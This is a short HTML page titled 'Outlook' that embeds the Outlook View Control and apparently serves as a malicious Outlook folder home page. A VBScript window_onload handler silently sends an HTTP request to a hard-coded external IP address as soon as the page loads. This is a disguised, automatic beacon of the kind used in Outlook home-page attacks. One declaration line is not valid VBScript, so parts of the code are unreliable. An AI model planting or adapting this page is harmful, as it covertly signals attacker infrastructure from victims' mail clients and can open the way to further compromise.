
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
    Sub window_onload()
        Dim httpRequest As Object
        Set httpRequest = CreateObject("MSXML2.ServerXMLHTTP")
        httpRequest.Open "GET", "http://64.44.115.238", False
        httpRequest.Send
        Set httpRequest = Nothing
    End Sub
-->

</script>
</head>

<body>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>
